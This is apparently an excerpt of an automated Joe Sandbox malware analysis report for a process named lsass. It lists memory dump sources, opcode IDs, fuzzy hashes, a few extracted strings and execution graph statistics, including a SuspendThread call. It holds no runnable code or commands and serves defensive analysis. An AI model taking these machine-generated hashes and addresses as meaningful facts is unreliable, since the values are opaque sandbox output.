                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 52d395f3cb77b215ecf33820cc8f0548e0be49555137969758d714880fc79098
                                        • Instruction ID: 16b210754226c6879fff88d14a01a8057f0f68fcf6353a9dfcde75196cfc6e95
                                        • Opcode Fuzzy Hash: 52d395f3cb77b215ecf33820cc8f0548e0be49555137969758d714880fc79098
                                        • Instruction Fuzzy Hash: E4110A10B2EC6E47F638865884749B47665EF54301B15467ED4AF8B4AAC83DBA809381
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1d12e9ebc3bf17b57fcb89ff6422ecacdefb3f62e5bcd959149eca4bc30563e7
                                        • Instruction ID: 57b04612221f24b5e2e87de4155d847f205c9d6e54844de2d7c8d192bd2610c1
                                        • Opcode Fuzzy Hash: 1d12e9ebc3bf17b57fcb89ff6422ecacdefb3f62e5bcd959149eca4bc30563e7
                                        • Instruction Fuzzy Hash: 5811E921B09D0D4BE358FB7988A5B767295EF9C314F01427EE41EC72E6CE7D69448380
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 52006c514ec15dd97b16e3e69248698cd8e3973727d90764103367bd49c4065b
                                        • Instruction ID: f7df92fd32e58352237db47657938c9e563ed7410e2e34fa625e123b653fceab
                                        • Opcode Fuzzy Hash: 52006c514ec15dd97b16e3e69248698cd8e3973727d90764103367bd49c4065b
                                        • Instruction Fuzzy Hash: EA110421F0AD4A4BF3A4EA5C88B47B162C6EF98311F490174D41DC72E7DE39BDC98281
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be7e610c3d478b23460d19010eef8bb116d6587bc6a1a644f60da0a192d87e73
                                        • Instruction ID: d9a89bd69f1ea1e1e82894b327e464a1b100a7152356dd27a409699561e66490
                                        • Opcode Fuzzy Hash: be7e610c3d478b23460d19010eef8bb116d6587bc6a1a644f60da0a192d87e73
                                        • Instruction Fuzzy Hash: D6119421F0A90E4BEBB4DB9888646B972F1EF58711F5142B6C40DD32B1DD68AE409B40
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 965c7d8d53d4c66dd90fe1a266bec856378d8d69fb433395a2ccc96c9f4234f8
                                        • Instruction ID: 183fb106f5fa3354881a26e9f7895cbcdac691f0b13e8da401fb2fbd823a4aec
                                        • Opcode Fuzzy Hash: 965c7d8d53d4c66dd90fe1a266bec856378d8d69fb433395a2ccc96c9f4234f8
                                        • Instruction Fuzzy Hash: E211E031B0E38D8FE722DBA8886509D7BB0EF42750F0641B7C094DB2A2D97416469784
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 862513e0eafe662011602a6df2071eee3a24266083ef797657dedf62e80cc849
                                        • Instruction ID: 16c7f487bf9542a074d1a7f5ee7e55a304027fa212f626aad0799453856d7423
                                        • Opcode Fuzzy Hash: 862513e0eafe662011602a6df2071eee3a24266083ef797657dedf62e80cc849
                                        • Instruction Fuzzy Hash: 3E11AD35A0E38D8FE722DBA8886519D7FB0EF42750F0641F7C494DB2A2D97826499784
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c38c0ecd784135cbfbe331722e12cde2d73c3ccc63ce9c93bcfba988b32c9a9d
                                        • Instruction ID: efbaa424027c0bad7f49fe3e113e7844b424ed341979ea7e98f13ee491893b21
                                        • Opcode Fuzzy Hash: c38c0ecd784135cbfbe331722e12cde2d73c3ccc63ce9c93bcfba988b32c9a9d
                                        • Instruction Fuzzy Hash: FD01B130609E0E8BDB34DF14C8A17B97790EF98300F52027AC459932F2CE3DBA419784
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e2ef186d99b40d4e28b4828c209fda44b75fda2e277ffbf5752b7df836eaf425
                                        • Instruction ID: e7ddea3f5e64cb0e0c2ca43367d53eff6c47184b1b1ace050d8d20c3dcd64c05
                                        • Opcode Fuzzy Hash: e2ef186d99b40d4e28b4828c209fda44b75fda2e277ffbf5752b7df836eaf425
                                        • Instruction Fuzzy Hash: BB11B13190496C8FDBA8DB04C894B9DB7B1EB58301F1585ADD40EE72A0CE75AE84CF85
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1d29aaad0675740fb4825a909e194ca96b65e44f09ec6c58d0e3c6eaf67779db
                                        • Instruction ID: 672595a80ccc0991d67ef8c7021a8114c6bb72a3c5533353491725dfe087d7fc
                                        • Opcode Fuzzy Hash: 1d29aaad0675740fb4825a909e194ca96b65e44f09ec6c58d0e3c6eaf67779db
                                        • Instruction Fuzzy Hash: 87019E35A0E38D8FE722DBA8886419C7FB0EF42750F1A41E7C094DB2A2D9786A45D784
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 396e1f3c283773694cb14a26bb744752eb010c92d3c9de13da9b687b2fc13392
                                        • Instruction ID: 551c68656e31ac82213c44d5e22d93131c9aa75c304701493b2a18bd4d0b4661
                                        • Opcode Fuzzy Hash: 396e1f3c283773694cb14a26bb744752eb010c92d3c9de13da9b687b2fc13392
                                        • Instruction Fuzzy Hash: 46017D3130DA4A4FD716CBA8D4B56E57BD0EF41320F1501BED555C75D2C659A614C780
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 37625c7ec51c926af631a86e0b3a21086d1f1e83a369ca7dceb5caba46f8315d
                                        • Instruction ID: 9c897b043c8c61bf0844120b3751222ef6438e0cebb149abf9c94a61b775b366
                                        • Opcode Fuzzy Hash: 37625c7ec51c926af631a86e0b3a21086d1f1e83a369ca7dceb5caba46f8315d
                                        • Instruction Fuzzy Hash: 4D01D131A49B0D8BD734DF54C491BB973A0FFA8310F11067AC046972A3CE3AA941CBC0
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ac8c58e04b4dd09c9758ed80dd013fea6193268895dd974cf001a767c77249e2
                                        • Instruction ID: f661d94179e635e32532556b7e4abda129e0c5a4a0c04684b993725935dc3a41
                                        • Opcode Fuzzy Hash: ac8c58e04b4dd09c9758ed80dd013fea6193268895dd974cf001a767c77249e2
                                        • Instruction Fuzzy Hash: 97F0623154F7C9AFD7228BB0C8615D93FB8EF47210B1A00E6D4A5C60A2C57D5A46C762
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cccad5e2b666cc557d82a96423c474fdc7c84d1bbff54c74e68863c154308442
                                        • Instruction ID: 31d82262a9070dc54e7b15851663d8c1434f5934fbe911eeb354a48b8c92e28d
                                        • Opcode Fuzzy Hash: cccad5e2b666cc557d82a96423c474fdc7c84d1bbff54c74e68863c154308442
                                        • Instruction Fuzzy Hash: 4801BC30E0E38D8FEB21DBA4886409C7FB0AF02740F1A41E7C094DB2A2D9781A44D740
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dad57465a2b1d385d4def3cf5b5529639ac70b98cfebedc5f43edd95a54ba4ec
                                        • Instruction ID: b43f2feadc0cb1d4a89029c03ddc1631565915f9f9f467d81a662ff780390494
                                        • Opcode Fuzzy Hash: dad57465a2b1d385d4def3cf5b5529639ac70b98cfebedc5f43edd95a54ba4ec
                                        • Instruction Fuzzy Hash: F1F0A021B0DF884FC76A566D4868061BFE1DB6A51134A43EFC045CB6B3ED59AC898342
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4eb1ffb5accd51ad36bdc4814720d1f5197c5ab215985cd5784c1b037849105d
                                        • Instruction ID: 624d4073347742b9ff765891060ddd61b86c9c0a59168b2dfd7acee5a4650519
                                        • Opcode Fuzzy Hash: 4eb1ffb5accd51ad36bdc4814720d1f5197c5ab215985cd5784c1b037849105d
                                        • Instruction Fuzzy Hash: 46F03130B0A91E8AEB74DB94CC547B973B1EF94312F1142B6C40ED31B5CEB86AC59B04
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0880b320df87e1fd2aebc6e1f84a766d2d09f04a7be67e37219169eba4ffc92b
                                        • Instruction ID: 66e275042fe43429db4194280a9873e1bea29862b087232ab798f4f052034040
                                        • Opcode Fuzzy Hash: 0880b320df87e1fd2aebc6e1f84a766d2d09f04a7be67e37219169eba4ffc92b
                                        • Instruction Fuzzy Hash: 4DF0557550D649CFD744AB38ECA18D4BB60EB46208B5611EAD088C7063E250055CC700
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d8be24aaa2b6836b7234efa9b661269457ee79e86a255a544c2654bd7d2947bb
                                        • Instruction ID: 108a32533256e0930b8b8c2393cea3606d30b5be9bcdca3e52b192c70ef83e3b
                                        • Opcode Fuzzy Hash: d8be24aaa2b6836b7234efa9b661269457ee79e86a255a544c2654bd7d2947bb
                                        • Instruction Fuzzy Hash: D7F09621A0EBC64FEB325BE44CA11B83FE0DF1734071906FAC4598B0E3D56976159751
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 620c400f58104c25ee72f0295a701db363e685c0fd8beffa55c38e5a76923487
                                        • Instruction ID: c023202db5ac554ee8ef429da07319877c102b9d1bea6545d85a11373985ff18
                                        • Opcode Fuzzy Hash: 620c400f58104c25ee72f0295a701db363e685c0fd8beffa55c38e5a76923487
                                        • Instruction Fuzzy Hash: D9F05420B0A50E4AEFB4D784C8A46B973B1EF54311F214176C40DD71F6CD696E459A44
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cdee1155981ea0287da762e0566d38a8a281bf7344a6daa33082e04b78932607
                                        • Instruction ID: 6925b17c767e6ac2b0aed3b1fe9db1a899add16af58187b1c36d85f29571b2d6
                                        • Opcode Fuzzy Hash: cdee1155981ea0287da762e0566d38a8a281bf7344a6daa33082e04b78932607
                                        • Instruction Fuzzy Hash: 14E0D820709B884FC70E9A388C695507FB1EB7710238A02DBD005CB2A3ED1DDCC9C751
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1f158bff5b829b422bbb2a48e6efe41d953bb783b57ac01076b245ff510083e9
                                        • Instruction ID: 298695a15140d47a4e3735a7d717b9477e7eccb34a87b4a5ab2076b5726cb9bc
                                        • Opcode Fuzzy Hash: 1f158bff5b829b422bbb2a48e6efe41d953bb783b57ac01076b245ff510083e9
                                        • Instruction Fuzzy Hash: 85F0B430B0920ECEF774DB98C4947E977E0FF54790F0442B5D018C62D5DA786684CB40
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33ce092d330706656787fe6c1980c23132291f1bbc9d9feda2edb2cb72a22dcb
                                        • Instruction ID: 289277905241efed55c810d967a070c52c913059ae72b46f2ead5c86f2e615c9
                                        • Opcode Fuzzy Hash: 33ce092d330706656787fe6c1980c23132291f1bbc9d9feda2edb2cb72a22dcb
                                        • Instruction Fuzzy Hash: 5CE09231B0851A8BF729A744C8B07B832A5EB94300F1641BCC94FD36E1DDB8AE018688
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6e1d9542f4646ab9c5ad8ff181ff6a7a64a2215a7f99e9b62c3147c18f685c2a
                                        • Instruction ID: e5253ccc090521f59d71c8090d7cfff90b29b500fcdc138b5dd0c06a30673fe5
                                        • Opcode Fuzzy Hash: 6e1d9542f4646ab9c5ad8ff181ff6a7a64a2215a7f99e9b62c3147c18f685c2a
                                        • Instruction Fuzzy Hash: BBE04F2694F7C04FCB1B9B3588B88903F70EE5721074A51EAC045CF1B3E91E9D4AC702
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 01e38e70d1fa6bb65dd097346d22abdbea730342f4aa22208da91687ed01f3b5
                                        • Instruction ID: 31cb928d6a64b144bb59743e4b8d3a11998b5290e6e4d3ba9f9e31f633f4b59a
                                        • Opcode Fuzzy Hash: 01e38e70d1fa6bb65dd097346d22abdbea730342f4aa22208da91687ed01f3b5
                                        • Instruction Fuzzy Hash: A4C04C06F5B51F01F53573EE54660ADB1405FD5E90FD70172D60C840E19DDD22D5215E
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6f60e8a32dc7cd82cdab9b8126faffc729a7f5ee650283cebf0420754674fa9f
                                        • Instruction ID: 65dab1aaab59432a3b2924f22a37de5358456d1e3ed899672f4e8ecaf9d4ea0e
                                        • Opcode Fuzzy Hash: 6f60e8a32dc7cd82cdab9b8126faffc729a7f5ee650283cebf0420754674fa9f
                                        • Instruction Fuzzy Hash: 39D09214B0FE5B85F67B4AC1817027955A85F41700E224239E07F498E1992FBB056201
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2e22298c2859926618715ea15b515993e236fb083192079b70e8cdf84373f805
                                        • Instruction ID: f93752eaf21a4b3ba75e99daf71e0c660fa20d729082769452b474588c295bc6
                                        • Opcode Fuzzy Hash: 2e22298c2859926618715ea15b515993e236fb083192079b70e8cdf84373f805
                                        • Instruction Fuzzy Hash: 46C04C02F1981A16F25E6718552167E44439F5861CFD641B4F82EDA3CECE5C5B0116C6
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 23b273a1a08826d1b8bc1d61c548047a97ae9cd01490883ee88b36607296e47a
                                        • Instruction ID: 7cf21f05094245be56c2dbee9adb12bde9cfcefa56b4bae0f5df1fa24ace8602
                                        • Opcode Fuzzy Hash: 23b273a1a08826d1b8bc1d61c548047a97ae9cd01490883ee88b36607296e47a
                                        • Instruction Fuzzy Hash: D0C01220A0EA4A8BF226479480352652BA49F42300F2340B9D42E4A8B2C96A7B069211
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                        • Instruction ID: 2277868fafa2bb2999c8a1dafac6a0a4c78bb41a2cc164afc5614813a4c2fb10
                                        • Opcode Fuzzy Hash: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                        • Instruction Fuzzy Hash: 30B01204D5740F00E53433FA089206970405B44540FC20170D80CC009198CD12D42246
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: c9$!k9$"s9$#{9
                                        • API String ID: 0-1692736845
                                        • Opcode ID: 8427abffb43e06e61b54787f1b924671775fca52df01a143520a22ac10f7113a
                                        • Instruction ID: 02d3f3b49675545417aa03f0796e16043be8708e0bec88f880b2b18217a52de5
                                        • Opcode Fuzzy Hash: 8427abffb43e06e61b54787f1b924671775fca52df01a143520a22ac10f7113a
                                        • Instruction Fuzzy Hash: DE418117B0D06659E239B3FD78619ED1B488FA927F70847B7F46D8D0D78C486085C2E9

                                        Execution Graph

                                        Execution Coverage:3.4%
                                        Dynamic/Decrypted Code Coverage:5.3%
                                        Signature Coverage:0%
                                        Total number of Nodes:19
                                        Total number of Limit Nodes:4
                                        execution_graph 25060 7ffd9bae13c0 25061 7ffd9bae5fd0 25060->25061 25064 7ffd9bae606c 25061->25064 25065 7ffd9bae5b90 25061->25065 25063 7ffd9bae6060 25067 7ffd9bae6900 25065->25067 25066 7ffd9bae6ab5 25067->25066 25070 7ffd9bae5890 25067->25070 25069 7ffd9bae69df 25069->25063 25071 7ffd9bae6d30 25070->25071 25074 7ffd9bae5898 25071->25074 25073 7ffd9bae6d39 25073->25069 25076 7ffd9bae6d60 25074->25076 25077 7ffd9bae7860 25076->25077 25078 7ffd9bae5a98 25076->25078 25080 7ffd9bae5aa1 25078->25080 25079 7ffd9bae5b3b 25080->25079 25081 7ffd9bafbced SuspendThread 25080->25081 25082 7ffd9bafbd24 25081->25082 25082->25076

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5[_H
                                        • API String ID: 0-3279724263
                                        • Opcode ID: dd61ee5f3603773a77af227fe0e3c0cf4e33f70abb6291c60c5554a60e0d58c3
                                        • Instruction ID: bba0043ab46303e0eb1c3041c49274c1740b20d09acd4018090667d003ed7676
                                        • Opcode Fuzzy Hash: dd61ee5f3603773a77af227fe0e3c0cf4e33f70abb6291c60c5554a60e0d58c3
                                        • Instruction Fuzzy Hash: 5B9105B1A09A8D8FE755EBAC88797A87BE1FF55314F0001BED04AD76E2DB782810C714
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b5220ef92d7c98ea70832ea4f349730e8380e1139e94e832d57058e7c553e92d
                                        • Instruction ID: 9deff2075b7e39b1a2e6a4bf5a4e66959be54af4e4276d0730f6ea7e75f0ac81
                                        • Opcode Fuzzy Hash: b5220ef92d7c98ea70832ea4f349730e8380e1139e94e832d57058e7c553e92d
                                        • Instruction Fuzzy Hash: 8B62E631B1991E4FEBA8EB5884656B87392FFA4350F0542B9D01EC31D7DE78BD428B80

                                        Control-flow Graph

                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9bad1000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7967070f0378c15cc1c9d4e11f48cd94f3199d84d8864b8cde017688ace889bc
                                        • Instruction ID: 5d494a2aa5e199b36369b7a8e2ff993b3352025e5a80e8b9eeb2927b8444b92e
                                        • Opcode Fuzzy Hash: 7967070f0378c15cc1c9d4e11f48cd94f3199d84d8864b8cde017688ace889bc
                                        • Instruction Fuzzy Hash: C9415972A0E78D4FEB69DBA898596B87FA0EF56310F04017FD04DC71A2EA646A05C741

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 9fb256dd3b3df440c8de97170cba62553e01930184ef206d859e708a80eed9dc
                                        • Instruction ID: 3098a41c1ad81645dabcf26bd7b20cfa2a9365705ce3693c6a8d86f4895dfff5
                                        • Opcode Fuzzy Hash: 9fb256dd3b3df440c8de97170cba62553e01930184ef206d859e708a80eed9dc
                                        • Instruction Fuzzy Hash: DE51A031E0960E9FDB5ADBA8C4655FDB7B1FF48304F1141BAD01AE72E6CA396905CB00

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9bac3000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: M
                                        • API String ID: 0-3664761504
                                        • Opcode ID: 755c72906c6671fe76f44db110342a4a086811fba057f98450a4d40f3ecb5b2b
                                        • Instruction ID: f1d300dbedab3f08788d44bea8edf006b567acaa91234cb1222e2df6ba7d2ff3
                                        • Opcode Fuzzy Hash: 755c72906c6671fe76f44db110342a4a086811fba057f98450a4d40f3ecb5b2b
                                        • Instruction Fuzzy Hash: C2F06261A1F3C54FDB26A7394C654647FA0EE6721074A82FFC096CB0F3D959994BC311

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 96 7ffd9bac5c59-7ffd9bac5c6d 97 7ffd9bac5c6f-7ffd9bac5c8a 96->97 98 7ffd9bac5c8e-7ffd9bac5c93 97->98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9bac3000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: M
                                        • API String ID: 0-3664761504
                                        • Opcode ID: 8e7f8278afc8eec2d210438dab6d5f9e596278666f49261b44566a46f451a591
                                        • Instruction ID: 721d77244758ea8574e583e0c1b9cab8fe7c0f7f574fe6e555d97bdc64095b2b
                                        • Opcode Fuzzy Hash: 8e7f8278afc8eec2d210438dab6d5f9e596278666f49261b44566a46f451a591
                                        • Instruction Fuzzy Hash: 69E0657150E7C48FC716AA7448694547FA0EF6720174A41EFC046CF1A7DA1DC845C701

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
